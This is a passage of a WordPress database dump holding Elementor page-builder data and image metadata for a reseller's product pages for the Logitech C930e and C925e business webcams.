FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7bf0124\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d625b68\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"e9ab9f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3875501\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>WIDE FIELD OF VIEW<\\/h4><p>With a generous, 90-degree field of view, C930e can capture teams and whiteboards with ease.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3fcac4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4011ea9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4X HD ZOOM<\\/h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. The premium image sensor delivers HD quality without jaggies or blur, even when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9c00649\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6a99b8d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MOUNTING &amp; PRIVACY OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount C930e on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0f8de15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9bd444d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CAMERA SETTINGS<\\/h4><p>Customize your C930e and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6135,1620,'_elementor_edit_mode','builder'),(6136,1620,'_elementor_template_type','post'),(5892,2999,'_elementor_version','0.4'),(5894,3006,'_wp_page_template','template-fullwidth.php'),(5895,3006,'_elementor_edit_mode','builder'),(5896,3006,'_elementor_template_type','post'),(5897,3006,'_elementor_data','[{\"id\":\"5483de2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7d021d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"f7f5e82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C930E<\\/h2><p>Business webcam with a wide field of view and HD digital zoom<\\/p><ul><li>1080p HD quality, ideal for video conferencing<\\/li><li>Excellent low-light performance with RightLight\\u2122 2<\\/li><li>Premium glass lens with autofocus<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3b69501\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fab6489\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c930e-webcam-1.png\",\"id\":3002}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27a697b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745a6ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6782e26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A WEBCAM THAT MEANS BUSINESS<\\/h2><p>Experience video calls that are the next best thing to being there in person. Sophisticated technology in the Logitech C930e Webcam delivers clear video and sound in virtually any environment, even low-light conditions. With 1080p resolution, H.264 video compression and a wide 90-degree field of view, C930e offers advanced webcam capabilities for superior video conferencing.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ac9d15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"72acab5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"7d04fc0\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6566062\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b2c2a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6e99860\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":40.753},\"elements\":[{\"id\":\"07c1971\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VIDEO IN ANY ENVIRONMENT<\\/h3><p>Show your best side on every video call, wherever you are. The C930e Webcam features 90-degree field of view, pan, tilt, and 4x digital zoom, allowing you to adjust the frame to fit your environment. RightLight\\u2122 2 Technology and a precision lens provide sharp video even in low-light conditions.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"506536d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":59.247},\"elements\":[{\"id\":\"b677e0b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c930e-webcam.jpg\",\"id\":3003}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"066fb5d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"39c3c9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a28099a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c930e-webcam-1.jpg\",\"id\":3004}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2538e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"70b3cb4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>HIGH QUALITY, LOW BANDWIDTH<\\/h4><p>Raise meeting productivity with remarkably clear video at all times \\u2013 even when bandwidth is limited. Optimized for Skype for Business, the C930e Webcam supports H.264 with Scalable Video Coding and UVC 1.5 encoding to minimize its dependence on computer and network resources.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f19736b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"144b878\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"48e0415\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7bf0124\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d625b68\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"e9ab9f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3875501\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>WIDE FIELD OF VIEW<\\/h4><p>With a generous, 90-degree field of view, C930e can capture teams and whiteboards with ease.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3fcac4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4011ea9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4X HD ZOOM<\\/h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. The premium image sensor delivers HD quality without jaggies or blur, even when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9c00649\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6a99b8d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MOUNTING &amp; PRIVACY OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount C930e on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0f8de15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9bd444d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CAMERA SETTINGS<\\/h4><p>Customize your C930e and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5898,3006,'_elementor_version','0.4'),(6096,3044,'_wp_page_template','template-fullwidth.php'),(6097,3044,'_elementor_edit_mode','builder'),(5903,3007,'_edit_lock','1551778543:1'),(5904,3008,'_edit_lock','1551778462:1'),(5905,3009,'_edit_lock','1551778433:1'),(6372,3072,'_elementor_data','[{\"id\":\"5fd679e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"089831d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"650b806\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6371,3072,'_wp_page_template','default'),(6368,3072,'_elementor_version','2.5.14'),(6369,3072,'_edit_lock','1569294804:1'),(5911,3007,'_edit_last','1'),(5912,3007,'_wp_page_template','template-fullwidth.php'),(5913,3007,'_hide_page_title',''),(5914,3007,'_hide_header',''),(5915,3007,'_hide_footer',''),(5916,3007,'_hide_breadcrumb',''),(5917,3007,'_cover',''),(5918,3007,'_show_excerpt',''),(5919,3007,'_wc_apply_product',''),(5920,3007,'_yoast_wpseo_content_score','30'),(5921,3008,'_edit_last','1'),(5922,3008,'_wp_page_template','template-fullwidth.php'),(5923,3008,'_hide_page_title',''),(5924,3008,'_hide_header',''),(5925,3008,'_hide_footer',''),(5926,3008,'_hide_breadcrumb',''),(5927,3008,'_cover',''),(5928,3008,'_show_excerpt',''),(5929,3008,'_wc_apply_product',''),(5930,3008,'_yoast_wpseo_content_score','30'),(5931,3008,'_elementor_edit_mode','builder'),(5932,3008,'_elementor_template_type','post'),(5933,3007,'_elementor_edit_mode','builder'),(5934,3007,'_elementor_template_type','post'),(5935,3013,'_wp_attached_file','2019/03/c925e-webcam-1.png'),(5936,3013,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:687;s:6:\"height\";i:600;s:4:\"file\";s:26:\"2019/03/c925e-webcam-1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-300x262.png\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-1-20x17.png\";s:5:\"width\";i:20;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5937,3013,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.90674655295969586177307064644992351531982421875;s:5:\"bytes\";i:85208;s:11:\"size_before\";i:475843;s:10:\"size_after\";i:390635;s:4:\"time\";d:0.54000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.0799999999999982946974341757595539093017578125;s:5:\"bytes\";i:3215;s:11:\"size_before\";i:18827;s:10:\"size_after\";i:15612;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.739999999999998436805981327779591083526611328125;s:5:\"bytes\";i:10394;s:11:\"size_before\";i:58586;s:10:\"size_after\";i:48192;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.440000000000001278976924368180334568023681640625;s:5:\"bytes\";i:7493;s:11:\"size_before\";i:40625;s:10:\"size_after\";i:33132;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.440000000000001278976924368180334568023681640625;s:5:\"bytes\";i:25835;s:11:\"size_before\";i:132895;s:10:\"size_after\";i:107060;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:38271;s:11:\"size_before\";i:224910;s:10:\"size_after\";i:186639;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(5938,3014,'_wp_attached_file','2019/03/c925e-webcam.jpg'),(5939,3014,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:24:\"2019/03/c925e-webcam.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"c925e-webcam-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5940,3014,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.5000069422267880980825793812982738018035888671875;s:5:\"bytes\";i:9363;s:11:\"size_before\";i:144046;s:10:\"size_after\";i:134683;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:576;s:11:\"size_before\";i:7053;s:10:\"size_after\";i:6477;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:583;s:11:\"size_before\";i:10888;s:10:\"size_after\";i:10305;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:3179;s:11:\"size_before\";i:49525;s:10:\"size_after\";i:46346;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.79999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:724;s:11:\"size_before\";i:10645;s:10:\"size_after\";i:9921;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.62999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:1700;s:11:\"size_before\";i:25658;s:10:\"size_after\";i:23958;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.45999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2601;s:11:\"size_before\";i:40277;s:10:\"size_after\";i:37676;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5941,3015,'_wp_attached_file','2019/03/c925e-webcam-1.jpg'),(5942,3015,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:26:\"2019/03/c925e-webcam-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"c925e-webcam-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5943,3015,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.6735206100974995280239454586990177631378173828125;s:5:\"bytes\";i:7949;s:11:\"size_before\";i:103590;s:10:\"size_after\";i:95641;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.28000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:314;s:11:\"size_before\";i:5000;s:10:\"size_after\";i:4686;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:519;s:11:\"size_before\";i:7427;s:10:\"size_after\";i:6908;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:3124;s:11:\"size_before\";i:35021;s:10:\"size_after\";i:31897;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:489;s:11:\"size_before\";i:7151;s:10:\"size_after\";i:6662;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.28000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:1170;s:11:\"size_before\";i:18635;s:10:\"size_after\";i:17465;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.69000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:2333;s:11:\"size_before\";i:30356;s:10:\"size_after\";i:28023;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(5944,3007,'_elementor_data','[{\"id\":\"7eb1b46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"90b3559\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26a8ab0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C925E<\\/h2><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p><ul><li>Designed for desktop video conferencing<\\/li><li>RightLight\\u2122 2 ensures clear video with typical office lighting<\\/li><li>Sliding internal shade assures privacy<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcb930b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a67935f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam-1.png\",\"id\":3013},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"33836ab\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d297e1a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1bb040\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C925E<\\/h2><p>Enhance every opportunity for collaboration with the Logitech C925e Webcam, which delivers affordably priced, HD-quality video in any office environment. The sturdy, adjustable clip makes it easy to mount on both laptops and external monitors, while a sliding shade assures privacy. The C925e works with virtually all video conferencing software applications, so you can quickly set up and run every meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62807a9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c9280e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"dce298e\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b80aec0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd91481\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8c829dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.806},\"elements\":[{\"id\":\"a18b328\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam.jpg\",\"id\":3014}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5a5a9cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.194},\"elements\":[{\"id\":\"3a9a2d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>MORE PRODUCTIVE CALLS<\\/h3><p>When you can\\u2019t meet in person, create a similar experience with the Logitech C925e Webcam and maintain team productivity. Full 1080p high-definition video at 30 frames per second delivers true-to-life clarity.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"54450f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"36b6683\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":40.645},\"elements\":[{\"id\":\"234303b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VIDEO IN ANY ENVIRONMENT<\\/h3><p>Show your best side on every video call, wherever you are. The C925e Webcam features a 78-degree field of view, just right for one or two people. With RightLight\\u2122 2 Technology, the C925e intelligently adjusts to improve visual quality in low-light and backlit situations.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aebe58b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":59.355},\"elements\":[{\"id\":\"ff49651\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam-1.jpg\",\"id\":3015}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f9af5e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ee152d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"ff07ea9\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6fbdfcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60c93c1\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"32c6b14\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3b70be4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE MOUNTING OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount C925e on your own tripod 